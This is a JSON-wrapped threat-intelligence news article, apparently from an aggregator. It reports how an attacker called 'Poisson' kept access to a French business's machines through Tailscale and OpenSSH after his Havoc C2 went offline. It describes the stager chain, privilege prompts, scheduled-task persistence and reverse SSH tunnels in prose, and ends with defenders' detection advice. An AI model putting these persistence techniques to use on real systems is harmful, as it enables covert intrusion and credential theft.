[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fldus9XVLao9MWHP4l6X1CmeNSkYeXV26MXInevrw5vo":3},{"article":4,"iocs":56},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":33,"category":34,"article_tags":38},"fb5bd582-9238-47e4-9cb7-a8b07e0b9e1c","Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline","junior-hacker-used-tailscale-and-openssh-to-keep-access-after-his-c2-went-offlin-538b5a","A French-speaking attacker broke into a small French automotive business, planted a keylogger, and stole banking and email credentials. Ordinary stuff, until one move near the end. Before his command-and-control server went dark, he installed OpenSSH and Tailscale on a victim's machine, building a way back in that did not run through the C2 at all. When the Havoc server went offline the next","A junior hacker, operating under the handle 'Poisson,' compromised a French automotive business using a custom malware chain. Notably, before his command-and-control server went offline, he installed OpenSSH and Tailscale on a victim machine, creating a persistent backdoor that bypassed the C2 infrastructure. This allowed him to regain access 18 days later when the C2 eventually returned, demonstrating a clever tactic to maintain persistence.","Junior hacker used Tailscale and OpenSSH to maintain access after C2 went offline.","Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline Swati KhandelwalJun 17, 2026Malware \u002F Cyber Attack A French-speaking attacker broke into a small French automotive business, planted a keylogger, and stole banking and email credentials. Ordinary stuff, until one move near the end. Before his command-and-control server went dark, he installed OpenSSH and Tailscale on a victim's machine, building a way back in that did not run through the C2 at all. When the Havoc server went offline the next day, his access did not. Eighteen days later, the C2 came back, his agents reconnected on their own, and he carried on. Cato Networks captured the whole operation command by command, 339 of them over 33 days, after the operator left his SSH keys and a step-by-step playbook in an open storage bucket. The write-up, published Tuesday by Cato CTRL researcher Vitaly Simonovich, is a rare view of an intrusion from the operator's keyboard rather than the forensic leftovers. Researchers' lesson is blunt: pulling a C2 server offline is not remediation if the attacker has already built a separate door. The actor, handle \"Poisson,\" is not an APT. Researchers describe a junior operator on what looks like a school schedule, active after 3 p.m. CET with a long midday gap, all of it running on free-tier kit: DuckDNS, Backblaze B2, and a cheap IONOS VPS in Berlin. His tradecraft was thin. He leaked his home directory five times, named his storage buckets after his own handle, and left a test file of his own keystrokes typed over and over inside the keylogger package. He failed at roughly half of what he tried. He compromised four machines anyway. The chain The malware ran almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which pulled down a .NET loader that ran Havoc's Demon agent without dropping the implant to disk. For elevation, he used Start-Process -Verb RunAs, which is not a silent UAC bypass. It pops the Windows consent prompt and waits for someone to click Yes. On one victim, it took a dozen tries across two days. After that came the nailing-down: a scheduled task running at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom-built RustDesk as a backup channel. The credential grabber was a 70-line Python keylogger that wrote keystrokes to a local file, with no beacon and no exfil server. Poisson just logged in, grabbed the file by hand, and ran powercfg to keep the machines from sleeping, so harvesting never paused. The move that matters On April 7, in a five-hour overnight session, he installed OpenSSH Server and Tailscale, joined the victim's machine to his private Tailscale network, and set up key-based SSH and a reverse tunnel. Now he could reach the machine over Tailscale's encrypted mesh with no C2 and no exposed ports. The next day, the Havoc infrastructure went offline. Cato does not say why, and it barely matters: the Tailscale path sat on a separate network, so the access lived. When the C2 returned on April 26, the agents reconnected automatically, no re-compromise required. Over the final five days, he ran 145 more commands, probed smart-card and certificate stores (a sign he was eyeing certificate-based logins), ran two unexplained executables from a file named Thales.zip for about 32 minutes total, then deleted 17 files and went quiet on May 1. What he wanted was narrow. No Mimikatz, no lateral movement, no ransomware, and no sign he took the documents he browsed, from tax records to insurance. Just what people type: banking logins, email passwords, government portals. For a small business owner, that is direct financial exposure. None of the tools is new, which is the point. China's APT31 used Tailscale through 2024 and 2025 to tunnel quietly out of Russian IT firms, Scattered Spider has leaned on legitimate remote-access tools like Ngrok and Fleetdeck, and RustDesk, Poisson's backup channel, turns up in recent Akira ransomware intrusions. The binaries are signed and legitimate, so detection that stops at bad files, not bad behavior, misses them. What Poisson adds is command-level proof that the trick outlives a takedown, run by someone clearly still learning. What to watch Cato's hunting list is concrete: Alert when OpenSSH Server installs on a Windows workstation, which is rarely legitimate. Watch for tailscale.exe on machines that have no reason to run a VPN. Look for ssh -R reverse tunnels heading to outside hosts. Check for wscript.exe running .vbs files out of user staging folders. Flag scheduled tasks set to the highest privileges that launch script interpreters. Watch for powercfg standby-timeout changes that keep machines awake. Block DuckDNS. The bigger one: when you find a C2, assume it is not the only way in, and go hunting for the quiet persistence layer behind it. What was in Thales.zip, and what those two programs did in their 32 minutes on the machine, is the question Cato leaves open. The answer that matters more: the C2 was never the intrusion, just one way into it. Kill it and leave OpenSSH, Tailscale, the scheduled task, and the keylogger running, and the attacker still has a way back in. That is the part remediation keeps missing. Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share Share SHARE  Command and Control, Cyber Attack, Havoc, keylogger, Malware, OpenSSH, Tailscale ⚡ Top Stories This Week Chrome V8 Zero-Day CVE-2026-11645 Exploited in the Wild - Patch Now Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models Microsoft Defender RoguePlanet Zero-Day Grants SYSTEM Access on Updated Windows Anthropic Releases Claude Fable 5, Its Most Powerful AI Yet, With Cyber Safeguards Microsoft Patches Record 206 Flaws, Including Three Zero-Days and Critical RCE Bugs Ivanti, Fortinet, and SAP Release Patches for Multiple Critical Vulnerabilities Cybersecurity Stars Awards 2026: Winners Announced Across 95 Categories ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories New GreatXML Exploit Bypasses Windows BitLocker via Recovery Partition XML Files Agentjacking Attack Tricks AI Coding Agents Into Running Malicious Code China-Linked Hackers Backdoored Linux Login Software to Hide for Nearly a Decade Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More ⭐ Featured Resources Get the 2026 Guide to Govern and Secure Enterprise AI Agents at Scale [Watch Demo] See Which Security Gaps Attackers Could Exploit First AI Can’t Stop Every Attack. Learn How Zero Trust Can Block What’s Unknown Have You Outgrown Your MDR? 7 Warning Signs Every CISO Should Check","https:\u002F\u002Fthehackernews.com\u002F2026\u002F06\u002Fjunior-hacker-used-tailscale-and.html","https:\u002F\u002Fblogger.googleusercontent.com\u002Fimg\u002Fb\u002FR29vZ2xl\u002FAVvXsEhN4ptzzF7u-dzNyOc4F1HsCUbEszvkkeD1ZVl7MHQNXXcUtgqb40Wgodu3aj61QDzaNsX0eJjRDGK1eNJLCbud-4iWHJjnpHPuCfTak2m9UydSW4DEJErr5L2V_KwD39P__6iVxgaOhH8mYtY2LhPFnyCavP8eJ_1N3QpGo4NkZaFJYVRc-LX0droem8Q\u002Fs1600\u002Fcyber.jpg","2026-06-17T16:00:56+00:00","2026-06-17T18:00:09.546938+00:00",8,[18,21,24,26,28,30],{"name":19,"type":20},"Poisson","threat_actor",{"name":22,"type":23},"Tailscale","product",{"name":25,"type":23},"OpenSSH",{"name":27,"type":23},"Havoc",{"name":29,"type":23},"RustDesk",{"name":31,"type":32},"Cato Networks","vendor","89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5",{"id":33,"icon":35,"name":36,"slug":37},null,"Malware","malware",[39,44,46,51],{"category":40},{"id":41,"icon":35,"name":42,"slug":43},"26b0b636-0e31-4db1-bffb-61bdf9f20a58","Supply Chain","supply-chain",{"category":45},{"id":33,"icon":35,"name":36,"slug":37},{"category":47},{"id":48,"icon":35,"name":49,"slug":50},"c5eccf7c-abbc-4bd3-bbed-e6da5cba8e73","Incident Response","incident-response",{"category":52},{"id":53,"icon":35,"name":54,"slug":55},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[57,59,62],{"type":37,"value":27,"context":58},"Command-and-control framework used by the attacker.",{"type":37,"value":60,"context":61},"Demon","Agent used by the Havoc framework.",{"type":37,"value":29,"context":63},"Backup remote access channel used by the attacker."]